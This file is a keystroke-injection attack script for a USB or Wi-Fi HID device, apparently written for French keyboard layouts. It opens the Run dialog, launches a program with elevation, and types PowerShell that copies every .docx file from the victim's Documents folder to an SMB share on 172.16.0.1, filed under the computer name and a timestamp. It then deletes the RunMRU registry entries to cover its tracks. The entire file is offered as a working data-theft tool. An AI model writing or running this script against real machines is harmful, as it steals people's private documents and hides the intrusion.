@_Doc_to_Smb.js

layout('fr')
typingSpeed(0,0)
press("GUI r")
delay(200)
type("notepad")
press("CTRL SHIFT ENTER")
delay(1000)
press("SHIFT TAB")
press("ENTER")
delay(3000)
type('\n')
type('$exfil_dir=')
layout('us') 
press("3")
layout('fr')
type ('$Env:UserProfile\\Documents')
layout('us') 
press("3")
layout('fr')
type ('\n')
type('$exfil_ext=')
layout('us') 
press("3")
layout('fr')
type ('*.docx')
layout('us') 
press("3")
layout('fr')
type ('\n')
type('$loot_dir=')
layout('us') 
press("3")
layout('fr')
type ('\\\\172.16.0.1\\Data\\$Env:ComputerName\\$((Get-Date).ToString(\'yyyy-MM-dd_hhmmtt\'))')
layout('us') 
press("3")
layout('fr')
type ('\n')
type('net use \\\\172.16.0.1\\Data ;\n')
type('mkdir $loot_dir\n')
type('robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z\n')
type('Remove-ItemProperty -Path \'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\' -Name \'*\' -ErrorAction SilentlyContinue\n')